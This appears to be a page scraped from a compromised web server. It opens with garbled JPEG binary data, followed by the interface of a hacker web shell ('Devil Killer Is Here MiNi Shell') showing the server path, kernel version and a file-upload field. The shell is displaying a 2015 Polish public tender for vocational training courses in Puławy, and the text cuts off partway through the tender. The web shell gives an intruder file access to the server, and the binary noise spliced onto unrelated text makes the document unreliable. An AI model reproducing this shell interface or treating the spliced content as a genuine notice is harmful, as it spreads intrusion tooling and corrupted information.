JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150420/89534-N-2015.html

<p class="kh_header"><b>Puławy: szkolenia w ramach  projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 89534 - 2015; data zamieszczenia: 20.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Leśna 17, 24-100 Puławy, woj. lubelskie, tel. 81 458 62 01, faks 81 458 62 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mops.pulawy.pl/zamowienia_publiczne</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> szkolenia w ramach  projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń dla beneficjentów ostatecznych projektu Aktywni-niezależni współfinansowanego z Europejskiego Funduszu Społecznego:
w części 1 Sprzedawca, kasjer, fakturzysta;
w części 2 Magazynier z obsługą wózków jezdniowych z napędem silnikowym;
w części 3 Kucharz małej gastronomii;
w części 4 Opiekun osób starszych, niepełnosprawnych  i dzieci;
w części 5 Konserwator budynków i terenów zielonych;
w części 6 Indywidualne doradztwo zawodowe;  
CZĘŚĆ NR 1 Sprzedawca, kasjer, fakturzysta
Liczba uczestników szkolenia: 2 osoby ( +/- 1 osoba)
Liczba grup: 1 grupa.
Liczba godzin: 90 godzin szkoleniowych, w tym 32 godzin zajęć teoretycznych , 56 godzin zajęć praktycznych i 2 godziny dydaktyczne egzamin.
Jedna godzina szkoleniowa liczy 60 min. i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę liczącą średnio 15 min., przy czym długość przerw może być ustalona w sposób elastyczny.
Czas trwania szkolenia: Szkolenie może odbywać się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 16:00  z zastrzeżeniem, że w ciągu jednego dnia maksymalna liczba godzin szkoleniowych nie przekroczy 8.
Miejsce szkolenia: teren Puław lub w odległości nie większej niż 50 km od Puław w takim przypadku  wykonawca zapewnia codzienny dojazd na szkolenie lub zwrot kosztów podróży ( bus, komunikacja miejska poza Puławami) z miejsca zamieszkania do miejsca szkolenia i z powrotem.
Termin szkolenia:  Termin do uzgodnienia w okresie IV - 10.VI. 2015r. Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego  
Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu  Aktywni-niezależni
Cel szkolenia: Nabycie wiedzy i umiejętności wymaganych na stanowisku sprzedawcy z wykorzystaniem urządzeń komputerowych i kas fiskalnych
CZĘŚĆ NR 2 Magazynier z obsługą wózków jezdniowych z napędem silnikowym
Liczba uczestników szkolenia: 2 osoby ( +/- 1 osoba)
Liczba godzin: 120 godzin szkoleniowych, w tym 98 godzin zajęć teoretycznych, 20 godzin zajęć praktycznych i 2 godziny dydaktyczne egzamin. W ciągu jednego dnia maksymalna liczba godzin szkoleniowych nie przekroczy 8. Jedna godzina szkoleniowa liczy 60 min. i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę liczącą średnio15 min., przy czym długość przerw może być ustalona w sposób elastyczny. 
Czas trwania szkolenia: Szkolenie może odbyć się w dni robocze, tj. od poniedziałku do piątku, w godzinach między 8:00 a 15:00.  
Miejsce szkolenia: Puławy lub w odległości nie większej niż 50 km. W takim przypadku wykonawca zapewnia  codzienny dojazd na szkolenie lub zwrot kosztów podróży ( bus, komunikacja miejska poza Puławami).
Termin szkolenia:  IV -10.VI.2015r. Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego.
Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu  Aktywni-niezależni
Cel szkolenia: przygotowanie teoretyczne i praktyczne oraz uzyskanie wiedzy, umiejętności i uprawnień operatora wózka widłowego oraz zdobycie umiejętności prowadzenia gospodarki magazynowej.
Zakres tematyczny: Zagadnienia z gospodarki magazynowej,  jazda wózkami widłowymi, obsługa komputerowych programów magazynowych. Minimalny zakres tematyczny kursu winien być zrealizowany zgodnie z rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002 r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz.U. Nr 70, poz. 650 z późn. zm.). program szkolenia powinien być uzgodniony z Urzędem Dozoru Technicznego
Sposób sprawdzania efektów szkolenia: szkolenie zostanie zakończone egzaminem zewnętrznym zgodnie z obowiązującymi przepisami w tym zakresie. W zakresie obsługi wózków jezdniowych niezwłocznie po zakończeniu szkolenia wykonawca zorganizuje  i opłaci egzamin zewnętrzny przed Urzędem Dozoru Technicznego w celu nabycia uprawnień do obsługi wózków jezdniowych. 
CZĘŚĆ NR 3 Kucharz małej gastronomii
Liczba uczestników szkolenia: 1 osoba ( możliwość odwołania w przypadku rezygnacji uczestnika)
Liczba godzin: 120 godzin szkoleniowych, w tym 90 godzin praktyki i 30 godzin teorii,  z zastrzeżeniem, że w ciągu jednego dnia maksymalna liczba godzin szkoleniowych nie przekroczy 8.
Jedna godzina szkoleniowa liczy 60 min. i obejmuje zajęcia edukacyjne liczące 45 min. oraz przerwę liczącą średnio 15 min., przy czym długość przerw może być ustalona w sposób elastyczny.
Czas trwania szkolenia: Szkolenie może odbywać się w dni robocze, tj. od poniedziałku do piątku,  w godzinach między 8:00 a 15:00. 
Miejsce szkolenia: Puławy lub miejscowość  do 50 km od Puław. W przypadku przeprowadzania szkolenia poza Puławami wykonawca jest zobowiązany do sfinansowania uczestnikowi kosztów dojazdów z miejsca zamieszkania do miejsca szkolenia i z powrotem.
Termin szkolenia:  IV - 10 VI 2015
 Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego.
Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu Aktywni-niezależni
Cel szkolenia: Opanowanie przez uczestników kursu podstawowych czynności niezbędnych do wykonania zawodu kucharza małej gastronomii.
Minimalny zakres tematyczny zajęć teoretycznych
*organizacja stanowiska pracy
*stosowanie zasad zdrowego i prawidłowego żywienia
*przestrzeganie przepisów sanitarno-epidemiologicznych
*obliczanie wartości odżywczej i energetycznej potraw
*dokonywanie oceny jakościowej surowców, półproduktów i gotowych potraw
*ocenianie przydatności surowców i półproduktów do obróbki kulinarnej
*przeprowadzanie obróbki wstępnej i obróbki cieplnej
*przygotowanie zup, sosów i potraw z różnych produktów oraz ciast, deserów i napojów
*dobieranie dodatków do różnych potraw
*obsługiwanie maszyn i urządzeń
*minimum sanitarne
Zajęcia praktyczne  w lokalu gastronomicznym, kuchni szkolnej, stołówce itp.
Sposób sprawdzania efektów szkolenia: Szkolenie winno zakończyć się egzaminem wewnętrznym oceniającym nabyte umiejętności. Wyniki egzaminu zostaną przedstawione Zamawiającemu wraz z pozostałą dokumentacją.
CZĘŚĆ NR 4 Opiekun osób starszych, niepełnosprawnych  i dzieci
Liczba uczestników szkolenia: 2 osoby ( +/- 1 osoba)
Liczba godzin: 100 godzin w tym 52 godziny  dydaktyczne (po 45 minut) teorii  w okresie 7 dni roboczych (po 8 godz. Dydaktycznych)  i 48 godzin zegarowych  praktyki w ciągu 6 dni roboczych.
Czas trwania szkolenia: Szkolenie może odbywać  się w dni robocze, tj. od poniedziałku do piątku  w godzinach między 8:00 a 15:00. 
 Miejsce szkolenia: Puławy lub miejscowość  do 50 km od Puław. W przypadku przeprowadzania szkolenia poza Puławami wykonawca jest zobowiązany do sfinansowania uczestnikowi kosztów dojazdów z miejsca zamieszkania do miejsca szkolenia i z powrotem.
 Zajęcia praktyczne -48 godziny zajęć w co najmniej 3 rodzajach placówek  opiekuńczych, w tym  co najmniej po 16 godzin w placówce wsparcia dziennego dla dzieci (przedszkole, żłobek, dom dziecka etc) -16 godzin w placówce opieki paliatywnej (hospicjum, szpital -oddział geriatrii), 16 godzin w placówce wsparcia osób niepełnosprawnych (ŚDS, ZAZ, WTZ ) i innych.
Termin szkolenia:  IV - 10.VI.2015r. Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego.
Uczestnicy szkolenia: klienci MOPS-u w Puławach, beneficjenci ostateczni projektu  Aktywni-niezależni
Cel szkolenia: Celem szkolenia jest przygotowanie uczestników do podjęcia pracy w charakterze opiekunki osób starszych, niepełnosprawnych i dzieci zarówno w instytucjach jak i w domach  prywatnych. Uczestnicy nabędą wiedzę teoretyczną i praktyczną z zakresu opieki i pielęgnacji osób zależnych.
Zakres tematyczny: Moduł Pielęgnacyjny - anatomia i fizjologia człowieka, potrzeby biologiczne, podstawy żywieniowe, podstawy dietetyki, żywienie i pielęgnacja dzieci, osób starszych i niepełnosprawnych, opieka nad chorym dzieckiem, osobą starszą i niepełnosprawną, pierwsza pomoc przedmedyczna w nagłych wypadkach, zagadnienia z rehabilitacji osób niepełnosprawnych, wykonywanie czynności higienicznych.
Moduł pedagogiczno -psychologiczny - podstawowe zagadnienia dotyczące rozwoju i wychowania dziecka, podstawy psychologii komunikacji z podopiecznym i jego rodziną, psychologiczne i pedagogiczne uwarunkowania pracy z osobami starszymi, chorymi i niepełnosprawnymi, rozpoznawanie i zaspokajanie potrzeb osób zależnych
Moduł animacyjny- organizowanie czasu dziecku, osobie starszej i niepełnosprawnej, podstawowe zagadnienia edukacji dzieci, osób starszych i niepełnosprawnych, gry i zabawy wpływające na rozwój dziecka
Praktyka zawodowa -praktyczne ćwiczenie umiejętności
Sposób sprawdzania efektów szkolenia: Szkolenie winno zakończyć się egzaminem wewnętrznym oceniającym nabyte umiejętności, oraz być podstawą do kolejnych szkoleń w tym zakresie,  uzupełniających kwalifikacje i doprowadzających do zdania egzaminu czeladniczego. Wyniki egzaminu zostaną przedstawione Zamawiającemu wraz z pozostałą dokumentacją.
CZĘŚĆ NR 5  Konserwator budynków i terenów zielonych
Liczba uczestników szkolenia: 4 osoby (+/- 1 osoba)
Liczba grup: 1 grupa.
Liczba godzin szkolenia: 100 h w tym teoria - 40 godzin dydaktycznych ( 5  dni roboczych po 8 dydaktycznych) i praktyka  60 godzin zegarowych w tym co najmniej 20 h zajęć praktycznych w budynkach.
Miejsce szkolenia: Puławy.
Termin szkolenia:  IV - 10 VI 2015. Zajęcia nie mogą pokrywać się z zaplanowanymi wcześniej terminami wsparcia grupowego.
Cel szkolenia: Szkolenie ma przygotować do pracy jako konserwator budynków i terenów zielonych.
Zakres tematyczny szkolenia: Program zajęć musi obejmować poniższą tematykę :
*Wiadomości o uprawie gleby, nawożeniu roślin, środkach ochrony, rodzajach nawozów i ich zastosowanie.
*Klasyfikacja roślin oraz dobieranie roślin w zależności od wymogów środowiska i celów dekoracyjnych.
*Projektowanie i zakładanie terenów zieleni różnej wielkości (np. place, rabaty, trawniki, zieleńce, parki, itp.) w tym: projektowanie, przygotowanie podłoży, wiadomości z zakresu urządzania terenów zielonych i ich urządzanie, prace porządkowe i roboty ziemne,  mała architektura ogrodowa.
*Analiza terenu przed przystąpieniem do prac.
*Dobieranie terminu siania, sadzenia oraz kierowanie siewem nasion, sadzonek drzewek ozdobnych.
*Zakładanie, sadzenie i pielęgnacja: drzew, trawników, bylin, rabat kwiatowych  i kwietników.
*zimowe utrzymywanie chodników i placów
*Zasady użytkowania oraz obsługi sprzętu mechanicznego, elektronarzędzi stosowanych w ogrodnictwie.
*Zasady organizacji pracy konserwatorskiej  i obmiaru robót
*Malowanie pomieszczeń
*Naprawy sprzętów meblowych  w biurach (min. wymiana zamków, naprawa krzeseł etc
*Naprawy konserwatorskie przy instalacjach elektrycznych oraz wodno -kanalizacyjnych nie wymagające uprawnień
Praktyka zawodowa -praktyczne ćwiczenia umiejętności.
CZĘŚĆ NR 6 Indywidualne doradztwo zawodowe
Liczba uczestników szkolenia: 16 osób ( +/- 1 osoba)
Czas trwania szkolenia: 32 h (1h = 45min), 2 h na każdą  osobę. Zajęcia powinny odbywać się w dni powszednie od poniedziałku do piątku w godzinach 8.00-16.00.
Termin szkolenia: 12,15,16,17  czerwca 2015 r. 
Miejsce  szkolenia: Puławy 
Minimalny zakres doradztwa:  
-sporządzenie Indywidualnego Planu Działania z określeniem obecnych kwalifikacji, potrzeby ich podwyższenia lub zmiany, określenia predyspozycji zawodowych, wyznaczenie ścieżki zawodowej pod kątem posiadanych kwalifikacji
 i umiejętności zawodowych;
-sporządzenie wspólnie z uczestnikiem CV i listu motywacyjnego w zakresie zakończonego szkolenia/ stażu;
-określenie potencjalnych pracodawców z wyszczególnieniem pracodawców lokalnego rynku pracy.
Na koniec doradztwa dla każdego beneficjenta ostatecznego zostanie sporządzony Indywidualny Plan Działania.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna ,że Wykonawca spełnia ten warunek dla części 6 jeżeli posiada:
* aktualny wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu n siedzibę instytucji szkoleniowej, zgodnie z art. 20 ust. 1 Ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. 2004 Nr 99 poz. 1001). Warunek zostanie uznany za spełniony, jeśli Wykonawca złoży oświadczenie o posiadaniu aktualnego wpisu do RIS - na Załączniku nr 3 do SIWZ. Zamawiający dokona weryfikacji posiadania ww. wpisu w formie elektronicznej na stronie www.ris.praca.gov.pl.
oraz	
*wpis do rejestru podmiotów prowadzących agencje zatrudnienia - zgodnie z art. 18 ust. 1 Ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz.U. 2004 Nr 99 poz. 1001).Warunek zostanie uznany za spełniony, jeśli Wykonawca złoży oświadczenie o posiadaniu wpisu do rejestru podmiotów prowadzących agencje zatrudnienia - na Załączniku nr 4 do SIWZ. Zamawiający dokona weryfikacji posiadania ww. wpisu w Krajowym Rejestrze Agencji Zatrudnienia dostępnym na stronie www.kraz.praca.gov.pl.       
  
Zamawiający nie stawia warunku szczegółowego w tym zakresie dla pozostałych części tj. 1,2,3,4 i 5</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował w :  
a)części 1 zamówienia Sprzedawca, kasjer, fakturzysta
osobą prowadzącą część teoretyczną o odpowiednich kwalifikacjach zgodnych z tematyką szkolenia i posiadającą co najmniej 3 letnie doświadczenie w pracy dydaktycznej w kształceniu dorosłych w formach poza szkolnych oraz osobą prowadzącą część praktyczną - posiadającą odpowiednie wykształcenie kierunkowe i co najmniej 3 letnią praktykę w nauczaniu zawodu sprzedawca.
b)części 2 zamówienia Magazynier z obsługą wózków jezdniowych z napędem silnikowym
osobą prowadzącą część teoretyczną o odpowiednich kwalifikacjach zgodnych z tematyką szkolenia i posiadającą co najmniej 3 letnie doświadczenie w pracy dydaktycznej w kształceniu dorosłych w formach poza szkolnych oraz osobą prowadzącą część praktyczną - posiadającą odpowiednie wykształcenie kierunkowe i co najmniej 3 letnią praktykę w nauczaniu zawodu 
c)części 3 zamówienia Kucharz małej gastronomii 
osobą prowadzącą część teoretyczną o odpowiednich kwalifikacjach zgodnych z tematyką szkolenia i posiadającą co najmniej 3 letnie doświadczenie w pracy dydaktycznej w kształceniu dorosłych w formach poza szkolnych;
d)części 4 zamówienia Opiekun osób starszych, niepełnosprawnych i dzieci 
osobą prowadzącą część teoretyczną o odpowiednich kwalifikacjach zgodnych z tematyką szkolenia i posiadającą co najmniej 3 letnie doświadczenie w pracy dydaktycznej w kształceniu dorosłych w formach poza szkolnych
e)części 5 zamówienia Konserwator budynków i terenów zielonych
osobą prowadzącą część teoretyczną o odpowiednich kwalifikacjach zgodnych z tematyką szkolenia i posiadającą co najmniej 3 letnie doświadczenie w pracy dydaktycznej w kształceniu dorosłych w formach poza szkolnych
f)części 6 zamówienia Indywidualne doradztwo zawodowe 
doradcą zawodowym legitymującym się co najmniej wykształceniem wyższym kierunkowym w zakresie doradztwa zawodowego lub wykształceniem wyższym i studiami podyplomowymi w zakresie doradztwa zawodowego certyfikat, zaświadczenie lub dyplom po ukończeniu kursu, szkoły lub studiów podyplomowych- (Zamawiający wymaga przedłożenia w/w dokumentów przed podpisaniem umowy) oraz będzie  posiadać doświadczenie w przeprowadzeniu minimum 20 godzin dydaktycznych  indywidualnego doradztwa zawodowego w okresie ostatnich 3 lat przed upływem terminu składania ofert. W przypadku zmiany kadry podstawowej Wykonawca zobowiązany jest zapewnić kadrę rezerwową z doświadczeniem i wykształceniem co najmniej takim jak kadra podstawowa.  

Ocena tego warunku  dla każdej części będzie dokonana na podstawie analizy treści załącznika nr 5 do SIWZ- wykazu osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty według wzoru stanowiącego załącznik nr1;
Pełnomocnictwo jeżeli dotyczy;
Lista zrealizowanych szkoleń w okresie ostatnich 3 lat przed upływem terminu składania ofert -według wzoru stanowiący załącznik nr 8 SIWZ, składana w celu przyznania punktów zgodnie z kryterium oceny ofert Doświadczenie Wykonawcy;
Lista przeprowadzonych godzin indywidualnego doradztwa w okresie ostatnich 3 lat przed upływem terminu składania ofert -według wzoru stanowiący załącznik nr 9 SIWZ, składana w celu przyznania punktów zgodnie z kryterium oceny ofert Doświadczenie Kadry.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.2.	Stosownie do art. 144 ustawy Prawo zamówień publicznych Zamawiający zastrzega możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której wybrano wykonawcę polegającej na zmianie:
